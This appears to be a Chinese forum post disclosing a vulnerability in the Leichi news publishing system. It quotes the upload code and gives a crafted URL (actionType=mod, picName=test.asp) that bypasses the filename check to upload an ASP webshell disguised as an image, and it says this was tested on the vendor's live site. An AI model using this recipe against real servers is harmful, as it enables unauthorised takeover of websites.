雷驰新闻发布管理系统漏洞分析
声明:漏洞为focn首先发现,版权归漏洞发现者focn所有,转载请保持文章完整,并注明出处!<br />本文章只做学习研究用,任何人用于其他非法用途本人不承担任何责任!<br /><br /><br />作者:黑萝卜<br />系统: 雷驰新闻发布管理系统<br />版本: 当前任何版本<br />漏洞描述:1 在admin文件夹下的uploadPic.inc.asp中,没有对访问权限进行限制,任意用户都可<br />          以 访问到此文件。任意用户都可以使用此文件上传文件到服务器<br />        2 uploadPic.inc.asp中虽然对上传文件的后缀名进行了限制但是可以绕过。请看代码!<br /><br />      if file.FileSize>0 then     ''如果 FileSize > 0 说明有文件数据 <br />        '生成图片名字<br />        if actionType= "mod" then<br />        remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))<br />        else<br />        if editRemNum<>"" then           <br />          remNum = editRemNum<br />        else<br />          Randomize<br />          remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)<br />        end if<br />        remFileName = remNum&"_"&(editImageNum+1)&".gif"<br />        end if<br />        <br />        file.SaveAs Server.mappath(formPath&remFileName)   ''保存文件 <br />        <br />%><br /><br /><br />关键的是 if actionType= "mod" then<br />        remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))<br />只要自己构造actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件<br />构造如下UPL<br />http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp<br />然后在上传文件里面填要传的图片格式的ASP木马<br />就可以在uppic目录下上传文件名为test.asp的文件<br /><br />本方法在雷驰官方网站上测试通过!·<br />再次希望大家不要用于非法用途!!
		页: 
[1]